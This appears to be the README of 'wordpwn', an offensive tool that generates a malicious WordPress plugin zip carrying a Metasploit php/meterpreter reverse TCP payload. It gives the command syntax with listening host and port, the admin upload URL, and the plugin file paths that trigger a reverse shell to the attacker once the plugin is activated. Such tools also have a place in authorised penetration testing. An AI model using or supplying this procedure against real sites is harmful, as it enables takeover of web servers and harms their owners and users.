Malicious WordPress plugin
This utility simply generates a WordPress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as MSFvenom is used to generate the payload.
It goes without mentioning that in order for this method to be effective, you must have credentials to a valid User account, with rights to add plugins to the WordPress website ;)
Usage Example
root@wetw0rk:~# python wordpwn.py
__ __ _
\ \ / /__ _ __ __| |_ ____ ___ __
\ \ /\ / / _ \| __/ _ | _ \ \ /\ / / _ \
\ V V / (_) | | | (_| | |_) \ V V /| | | |
\_/\_/ \___/|_| \__,_| .__/ \_/\_/ |_| |_|
|_|
Usage: wordpwn.py [LHOST] [LPORT] [HANDLER]
Example: wordpwn.py 192.168.0.6 8888 Y
How and When do I use this?
Usage is super simple, simply pass wordpwn your listening address and listening port and execute the script. You are also given the option to start a handler, I recommend that you do... since by default the plugin will be made using a php/meterpreter/reverse_tcp
reverse shell.If you have your own nefarious PHP payload simply adjust the script to accept it.
After the script is ran, a zip file (the plugin) called malicious.zip
will be created in the current directory (and a handler will be started if you specified it with the Y
option).
Upload this zip file as a new plugin (by browsing to the URL http://(target)/wp-admin/plugin-install.php?tab=upload
).
Once uploaded, you have to activate the plugin.
Be sure to start our listener (if you didn't specify the handler with the Y
option) !
Once the plugin installed and activated, just navigate to the following URLs to launch the reverse shell :
- http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.php
- http://(target)/wp-content/plugins/malicious/QwertyRocks.php
Note: if the script usage is still a mystery to you, JavaRockstar has made a tutorial on his website HackingVision about it.
PLEASE READ
I want to be 100% sure that I give credit to Rob Carr. Rob Carr is the author of the Metasploit module wp_admin_shell_upload
, which this script is based on. You can find more information on his module at Rapid7 .